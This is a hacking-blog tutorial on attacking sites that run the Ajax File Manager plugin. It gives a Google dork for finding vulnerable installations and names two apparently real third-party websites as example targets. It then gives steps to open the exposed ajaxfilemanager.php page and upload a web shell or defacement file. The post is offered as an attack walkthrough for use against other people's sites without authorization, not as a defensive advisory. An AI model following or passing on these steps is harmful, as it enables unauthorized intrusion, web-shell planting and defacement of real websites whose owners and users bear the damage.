Vulnerability in Ajax File Manager - Upload Shell

• Share This Post
• Twitter
• Facebook
• Digg
• StumbleUpon
• Delicious
• Reddit
• Feed RSS

AJAX is about updating parts of a web page, without reloading the whole page.



 

•  First of all open Google Search Engine.
• Now type this google dork in it inurl:/plugins/ajaxfilemanager/ 
• Now hit Search and open any website shown in the result.

For Example :

• http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/ 
• http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/

or any site else ...

• Now Put  ajaxfilemanager/ajaxfilemanager.php after /plugins/ in url.
• It will look like as below :

For example : 

• http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php 
• http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

• Now Find Upload and Upload Your shell/Deface/file 
• To view you File find /Uploaded/ directory in Website by using your brain.

About the Author

I am XEO Hacker, the founder of Hack With Style (HWS). I am blogging since 2009 before that I just search things and now I am sharing my knowledge through this plateform.I'm also a freelance writer on topics related to Website Hacking,Website Optimization (SEO), blogger customizations and making money online.

Follow @xeohacker

In 61 people's circles

Subscribe To Get FREE Tutorials!

Respected Readers: As a 21 year old student, the only income I rely on is my pocket money. Bearing the running costs of HWS Blog has become really difficult. We educate thousands of bloggers a week with our tutorials. To help us go forward with the same spirit, a small contribution from your side will highly be appreciated.

Posted in: Website hacking